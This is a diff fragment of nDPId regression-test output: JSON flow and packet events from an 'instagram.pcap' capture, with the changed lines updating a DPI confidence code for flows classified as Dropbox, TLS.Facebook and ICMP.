00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906017,"flow_last_seen":1436720906017,"flow_idle_time":200000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906017,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1436720906017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"thread_ts_msec":1436720906017,"pkt":"\/\/\/\/\/\/\/\/ABZEH1lmCABFAACDA5AAAIARdcjAqABq\/\/\/\/\/0RcRFwAb\/+ueyJob3N0X2ludCI6IDQxMzc2NzExNiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDA5Mjk0MDNdfQ=="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906017,"flow_last_seen":1436720906017,"flow_idle_time":200000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906017,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906017,"flow_last_seen":1436720906017,"flow_idle_time":200000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906017,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1436720906019,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"thread_ts_msec":1436720906019,"pkt":"\/\/\/\/\/\/\/\/ABZEH1lmCABFAACDA5EAAIARdcfAqABq\/\/\/\/\/0RcRFwAb\/+ueyJob3N0X2ludCI6IDQxMzc2NzExNiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDA5Mjk0MDNdfQ=="} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1436720906020,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"thread_ts_msec":1436720906020,"pkt":"\/\/\/\/\/\/\/\/ABZEH1lmCABFAACDA5IAAIARdcbAqABq\/\/\/\/\/0RcRFwAb\/+ueyJob3N0X2ludCI6IDQxMzc2NzExNiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDA5Mjk0MDNdfQ=="} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":200000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906022,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1436720906022,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"thread_ts_msec":1436720906022,"pkt":"\/\/\/\/\/\/\/\/ABZEH1lmCABFAACDA5MAAIARtB3AqABqwKgA\/0RcRFwAbz4HeyJob3N0X2ludCI6IDQxMzc2NzExNiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDA5Mjk0MDNdfQ=="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":200000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906022,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":200000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906022,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906025,"flow_last_seen":1436720906025,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1436720906025,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.255","src_port":520,"dst_port":520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1436720906025,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720906025,"pkt":"\/\/\/\/\/\/\/\/ABsv8H60CABFAAA0BsVAAEARsaPAqAABwKgA\/wIIAggAILagAgEAAAACAADAqAAAAAAAAAAAAAAAAAAB"} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906070,"flow_last_seen":1436720906070,"flow_idle_time":7580000,"flow_min_l4_payload_len":613,"flow_max_l4_payload_len":613,"flow_tot_l4_payload_len":613,"flow_avg_l4_payload_len":613,"midstream":1,"thread_ts_msec":1436720906070,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1436720906070,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":679,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":679,"pkt_l4_len":645,"thread_ts_msec":1436720906070,"pkt":"QPMIw47hABsv8H60CABFAAKZYWZAAFUGhKgfDV00wKgAZwG7hI6seG5hv38UHoAYAGuTKQAAAQEICltMYqkAA+18FwMBAmCl7hwsC927JcFSAZYWLzz9PCOE13q\/R1R\/4Ep\/l7+HHbIpOFFcCYs42I3wFOgWiBw3wjx3pJOgTGydZF67jt6\/BKND+v8oyfRpnqlS5YMAWUNymHV7uHWxp+hxonkw6cNC93nRZtrxzkz6LP0NT0kghBPZC1Qj+5R6TJU9O4JNVgnaOk7a2PLjjlpxNviWyDprqQXVx0ggqtiTSBMr7Uc5EfDpzAAkL4Ijs+Gp7u5RRsTL\/vjjpIbFtLB91jbWUmuE049zO8Z0ZXe+NUKtpOUeDZz+3zpQ7uf3ydorfitQX7zdybIk3\/bzSVhOShF3BJrYBLAD2AQ24us0\/KfVGECFrd6OK2BQqjf6ncI9qOXNwiVF\/2inbzY\/Q3OsYRcS7XHEaq0O5REHcT8SzE5VoLX4XXQtBoZwVB5Yrj77GtBQdmGZD6u8UMQpctBx6N9Mr51OWWfdFnAbts6SnZuXGzlYjqJOxS7Vx73Uw8fCkf1IEri8UI1qbM9veDNciQdo3CmVyvU7iM87rUz7C0f+A4f1opsUJ5+EheBr1eGc36Efb4\/Ualnnz3nkJR3hncStDick4US+OxlgvGof266YJgZuAwCGxYg4vW2knDKYz5umzCws7lIHpIdAFNPByVtoUTPTPQS5UKgIEdb95j7F6DccGwtWvRW1Al5LucPJI7zWS2dtNSdT\/Ojj1Rno0QRGwZ45j0In5POotAgCjk30MTwIN5HhcpigFfTCmuPMsYmTn6MoC7DboyOfYCjSc6fhkNqfZ2xyKSzKyqklgdTHeGfRwO+op5ygRsksmKTJ1Q\/4mw=="} 
-00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906070,"flow_last_seen":1436720906070,"flow_idle_time":7580000,"flow_min_l4_payload_len":613,"flow_max_l4_payload_len":613,"flow_tot_l4_payload_len":613,"flow_avg_l4_payload_len":613,"midstream":1,"thread_ts_msec":1436720906070,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906070,"flow_last_seen":1436720906070,"flow_idle_time":7580000,"flow_min_l4_payload_len":613,"flow_max_l4_payload_len":613,"flow_tot_l4_payload_len":613,"flow_avg_l4_payload_len":613,"midstream":1,"thread_ts_msec":1436720906070,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1436720906070,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720906070,"pkt":"ABsv8H60QPMIw47hCABFAAA0Ga9AAEAG48TAqABnHw1dNISOAbu\/fxQerHhwxoAQAW09dwAAAQEICgAD7YxbTGKp"} 
01772{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1436720908201,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908201,"pkt":"ABsv8H60QPMIw47hCABFAAPpGbBAAEAG4A7AqABnHw1dNISOAbu\/fxQerHhwxoAYAW1v8wAAAQEICgAD7mFbTGKpFwMBA7AOHMI1ALyiYU3ya6qg+prWQI\/n9ANspqMl7L4ePI46MbeMU\/IIKBcoHTRp\/G5Sihc5nIJHuC2+37mEcl691gW4u\/TM4cTkpTf1jvX2GQ4y6\/txghh7z8FoXfNbqCHIq72qOYxX78zowj+FiMRcWPEmeWcWoH+gdWfhPA\/lkpOWh7PAWcTM6YhVbfKMzFVog0eNO6nAQ6Db4QV49GBIVCzfrXCBVeXZAcW0CL72bBYmhxsuCeKWPO3s6v5st61\/TqBX2wKyuhuh0iYRoQoS\/wYMoppq1iw5UM\/55LosXWjVhX+LnpSLv52m8IfyQkh1vrv+SJ7KjFgIF5haejMGRgEB6k28tUeT6FGaiUo32klBF\/ovhJ\/7PzYE5+p1Zs2WdUsskxD79HTvK6ta+oXXgI8zxnT+FY6f4Y3Qg+b6yTS68sbWyHT6\/PezdvhWfHtL0SSgHp8goibROD\/tT\/ewXwhvrOEixGKhip+cFDAiL8AxMi3V3Lo6cis85J1puKveGyk09JQyFUAk\/2r5Yl++ASyNB2yelevEI5wg+VsEb8Rcm\/QA7noQyfs1T5YOnO8NCBiPmye5eIk\/wZxnX1f+2xdUrgycDikO6k0cQg3utcfRP10t4qmvTrg2ek70WkuE+ATLg2Um1eRaeb81BxGpDBojTreWbcm5dcICJMpu5Jn\/w\/\/OFgLDd8zIcqEDUouT6ZCScciar49BKHurWy8NKFla9SI75KJQz9yq3QZyAG0rJc2lhQMyl9+7b4Ogizx8Jo29kTu8fZJSlg+ABrC1jcExXQD49OmAnZxwfKy6D2pC9Rse0qtqmzV+ovVEbJp+oxkyoXka2nmc36kfQhlZgI7KVixFLMTTlCevMnYrq1xJ\/MKzvCd6IWf+N5EocWD+ilOqptHNEIAOXJmgXODhL5KGWjQb8\/91W1IyUi6q\/ngSGvVRUpY8iujk6L\/C+Bbj\/Dm4AkcumBcragxaghvlWXmc47QSkqomVkZppr19doVE596Z\/iAcdVNMq1wy+2v27UYh5CMr3l5X59P07fb7g36BHbE7SHRjrHyy9CTFMxhEf0YgUq5TdIHDFI5lE\/KxLNZVidU3ki5Un7VFtJrfQka6os1jVOGfB9pUZq5Qsmwf1i\/ygu+C28zlN53MQWP6wHjI3WJZUBr81SukNH57IK2c2EyIu0E+HAgTgoJHe51A\/fUmZ1cYv7+JWrlM8pRHdKg4V83a8+0QRZUGb14qwNk4zB82iOuTyKlfeqGDo1mtsQ=="} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908216,"flow_last_seen":1436720908216,"flow_idle_time":7580000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908216,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01761{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1436720908216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908216,"pkt":"ABsv8H60QPMIw47hCABFAAPpl5BAAEAGYi7AqABnHw1dNISPAbuBQH+NqOzE9YAYAR7+6wAAAQEICgAD7mJbGFWXFwMBA7DGXKcxYYzj4PsFQPMmYQehh8iuvFDU6ChyMypfRInDCFuixSLIKOq63dIUv38njMJN2kVy\/t+T8m9xPVbEGAFdD3PpSc3SZZnBHiv5tCRNZzMhDLWXPkOIN9Lutipqd5IVnEEsBFkO\/fZ2K81T8PYPXOUELo\/sV11FwruvuAKdrrJSJDxsNb8ZavjfuhrjTCNZ8992aq+Ku9jOSU4Xa7Q\/BYCty1PvPxxBeD0eYCG+tOtkysHtjUZlr1d4OQxDr\/61YS0x9iJOXjnMBoobCu17VKBkd2hUXNptzi\/uIUhzamB9Rremxs\/xa5ErUN6bjCfTqClJMKTo2+EPLLC2OrnUwhZPfwAqX4LMjZxrO4OjWeKTq0PJEWrYJt\/hZgR9r16F85siGrf6FK1kTDvb0+vybKakTv5L4R+tKZVBNuaZabfxVkkl5TNMskAuzgaRl4NAmD9vaxsUvWa1r1eavZpU2b4i3TllipunjR4aQEFb47bl0X9Ru9Hl1x54J53nJ+MJknrPmdJbHBa5kRwAqKgaQptXtnMz1WTWV+Q8a53Upaic+O0txvujdC90+KUOiiTbhfTw0gAmNmPQmi2l+V2tphQpp2jEsWxETCl2LSUnlcR9XDLGnBO3KYnN9C0+k2yBKCMObHAcOzwdJWheAOhMNBVSNpFtrfOE6uSTsVbDj23xeCxxC1QAM7YJmxoVRhtdVyIDYYANmHTFeA\/uC6oLDeExrKyQP7kSEfNbdUqTNPu\/MJKIjJDZu1yLmyvi1O\/nGho5EDKw8IVXPxnfKKPvaQH2GtI88pEfGeAEyC\/HE\/tmFwWll7dh2qPp5A3wF8sKJ3O0eDAbcGfPED7oJA+EsxJAhKT6isvErCueBtWMHVSeiLsoME8tf6cS9zzgnk33LczZTQgm29MSHE7
ZL2GeiGbzuGwrTGDnk1VDLJRove2wMug8H7\/TzDu7ltmYb22OyZHWPR+qBc0SXnC41HvKpdG4l5lloyRu51PXhn1Z4SBmRKxgHOd10WPpGH9Et\/GeMS7LFYrc7oqcb6G7UCvo5VgI1SuJrJeY0vV2tCM0MyJYykeRmE4\/7F1xpcmuoE1e5ET3+6eiLGpqXUS7VkABwgQafZxjQScCWI5pekzUYOfjX5epPROl\/DzQKTCdpj3Gvhf2XBY54ImjWPLE32kUQllKDfXNIYtYFjXJbjsc4Zka4\/X4kGWgbCWN+dmnakKME8cbt\/+4rEk8PQFIv1W4FPcpki7hccXc0xhFEqm0Sw=="} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908216,"flow_last_seen":1436720908216,"flow_idle_time":7580000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908216,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908216,"flow_last_seen":1436720908216,"flow_idle_time":7580000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908216,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1436720908259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908259,"pkt":"QPMIw47hABsv8H60CABFAAA0u1VAAFUGLR4fDV00wKgAZwG7hI+o7MT1gUCDQoAQAFyKzgAAAQEIClsYbBQAA+5i"} 02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1436720908432,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720908432,"pkt":"QPMIw47hABsv8H60CABFAAWqu1ZAAFUGJ6cfDV00wKgAZwG7hI+o7MT1gUCDQoAQAFzmhwAAAQEIClsYbL0AA+5iFwMBBgCkPdU4R6wGSIS3keHeixTLTI9zV+il0PpZ8q91YamIsd4IZ1iA9S2D6W\/nJ4T6403w2+fJe+hdEKNsk0963CdXOEXDNkQKpXOBBE+0Y\/4Fle8ueshRyGFFEoc6PtZpKpwayy+TKxEJ4pFJyX2oGMWjaZzaOyD59AskeV\/YOll+Xm0S27uMjZKkLBkCxDNPTNhB8fh\/syM9nxdE4huEu1SgtsgSRap7+5OfSJa0vJji4Lac5HIGGpVuCAdsaWkkirxUeGhBT5KqUaH3z34YK2q9OCFDjG6zQx+K5wB6\/1tRpCV4T0Wdq9iazWqTK9fhu3Q8m7M+n+OlMsKGxDIEQhTmUFv6EsILdWY4XaXzsNt68ilI12u8FIErHj5xADP5BSss+D\/PqbyyYfj1siM7kMLTpiPXuCUljd29w+P7wtJOUzlqcHwFv60jtkmE5R7DR9LN47rlhx2ZgEX8b9nsvGl\/Z1KSCJ1m3XV6f0806axX94l9imfNEVAHweCX3kOlfFNWODbpNzNbLbpVtPn7xKRA5Y140DajcNQvyREJ7DrHWIxbEPKUq+SIMaNEJqDkl0rYnPqvJYuixcmcTK6joyocw7sF+MmuWuJzAwYoGvQacoqaNqOp0iEPlyz8x6cTF7HbzVKHlLYHsfsKMGz98miVsnjvci5f7S+qZN8wJt+ycMpErrmm5SYVwnyDiARUnY01FjBiu7oXosmSU8r8tl1Y7oQcefwWQmUMJwEVoICnXk5o\/1P1fTAJawMxQor10OxDf\/BV8+4BnkZNbktKhC4u6rpy4t9mTFTFoJnekuOgtsyuYF1D1pTovQynkNog8sbNDLg6lOVy2sSjtN38M5BrjfWP6NvWf5rAbsDm9Qvw2VUkrLm+vXfuLJeKqhTOHspJB2ZVScw6fgqCCRgXV4hbT47jXkZHPFeUj3xtv5oznldP1XEp\/Y0YyZnWCMaWATZlGVUiSYeiFbrcd70L0WujcTQSesgJzHbOqeptYMiDDVIYXi5utFDZis9FPZA2ul\/lArmvEL
\/urLFDKdnXMnNjyIIqJtwWZlcpDAHOfD2KyMM51NtnpD3NXBz6ngCZNoi3DrWeJbaK2NX4FFrr9nkmfuHb0MCV8zapTpFVeDqmiCnEMr1A22q06nZsJij0BS+jpAlud6+DjOPKWljFzy06Xn15YGW3Dm07Vi1rGNQXnlLIYZbH\/Lf9VbK8rn+tf2U4X+kmR\/seSiHTIiCrfQRY82NcG+s2JE\/3RNuUUsdP3+A8UZATxsKmMNb9p9jduLcV5NSz3qcz\/E+TORnhzC5qM5iDlSbThKZAPEgvS54QGz00rdEYWdvIwL1jLd2l2yP9aEoOWrH+sNsRBCU97PG1IRhRS5jctVYyDntPEBlAbqGj6sdT5C6POfN9JdpaIsZmGaMmnU0z4bjokazZ5F6F501SFGcsFKmgoCdZLCQyyA\/CkkbqEF1LeEPM1KkE88DAsVjRhjRCz9D6VKRt8PZdtywXXp7E7yF8+4SN\/2h5CqHv4N+v+ejLyvCd2t1L4BFuJ7BTwaB6NicxBq3cWSEeADsWxC4xODPl+fmk90gThIrGh3\/E3G\/K8LjJkXPwBqDPoSCAh\/lyvY4cI9USKSjdTboTHfChgT73IzMJk4MESnvGhexHkwWw4ndKaJ88XZfXiGJCI\/GHCwJX7Zu\/IG7bV7st4TnImk\/Ds\/xEG7y3JgmTAc9wIRPfDmTaMW0XI0vpt5j1BnCLq+es4TBuh9vggrd8U5G3S+2hj2u1HQPo3wjRAM4dNo6in8nnmD4n\/\/G9yrHWQwizkMQMUhZbY0jDslavyFSGnWc0JVIhfEzkCZm+lGdYxoDPUYKjjFRFeJ8o"} 00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908464,"flow_last_seen":1436720908464,"flow_idle_time":140000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1436720908464,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1436720908464,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1436720908464,"pkt":"AAAAAAAAAAAAAAAACABFwABYvRcAAEABOq\/AqABnwKgAZwMDE08AAAAARQAAPFm5QABABkodwKgAZ63CKBTA+AG7+Mu3wgAAAACgAjkIlxQAAAIEBbQEAggKAAPuewAAAAABAwMG"} 
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908464,"flow_last_seen":1436720908464,"flow_idle_time":140000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1436720908464,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.471674} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908464,"flow_last_seen":1436720908464,"flow_idle_time":140000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1436720908464,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.471674} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1436720908464,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1436720908464,"pkt":"AAAAAAAAAAAAAAAACABFwABYvRcAAEABOq\/AqABnwKgAZwMDE08AAAAARQAAPFm5QABABkodwKgAZ63CKBTA+AG7+Mu3wgAAAACgAjkIlxQAAAIEBbQEAggKAAPuewAAAAABAwMG"} 
